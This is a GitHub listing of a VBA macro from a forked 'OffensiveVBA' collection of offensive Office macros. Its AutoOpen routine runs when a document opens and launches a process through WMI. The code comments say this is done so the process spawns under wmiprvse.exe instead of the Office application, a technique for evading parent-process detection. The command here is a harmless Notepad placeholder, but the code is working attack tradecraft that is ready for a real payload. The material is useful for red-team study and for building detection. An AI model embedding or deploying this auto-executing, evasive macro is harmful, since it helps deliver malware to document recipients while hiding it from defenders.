forked from S3cur3Th1sSh1t/OffensiveVBA
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathWMI_Process_Create2.vba
29 lines (26 loc) · 1003 Bytes
/
WMI_Process_Create2.vba
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Sub AutoOpen()
' Using this technique the new process will be spawned under “wmiprvse.exe” instead of the Office process.
Const SW_NORMAL = 1
strComputer = "."
strCommand = "Notepad.exe"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
' Configure the Notepad process to show a window
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = SW_NORMAL
' Create Notepad process
Set objProcess = objWMIService.Get("Win32_Process")
intReturn = objProcess.Create _
(strCommand, Null, objConfig, intProcessID)
If intReturn <> 0 Then
Wscript.Echo "Process could not be created." & _
vbNewLine & "Command line: " & strCommand & _
vbNewLine & "Return value: " & intReturn
Else
Wscript.Echo "Process created." & _
vbNewLine & "Command line: " & strCommand & _
vbNewLine & "Process ID: " & intProcessID
End If
End Sub